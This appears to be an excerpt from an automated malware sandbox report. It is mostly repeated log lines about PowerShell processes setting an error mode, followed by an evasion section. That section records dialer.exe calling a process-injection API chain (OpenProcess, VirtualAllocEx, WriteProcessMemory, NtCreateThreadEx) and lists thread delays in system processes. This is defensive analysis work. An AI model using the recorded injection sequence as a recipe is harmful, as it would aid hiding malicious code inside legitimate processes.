                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,4_2_00007FF78AB310C0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4262Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5599Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5847Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3921Jump to behavior
                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 8389Jump to behavior
                Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 1610Jump to behavior
                Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9926Jump to behavior
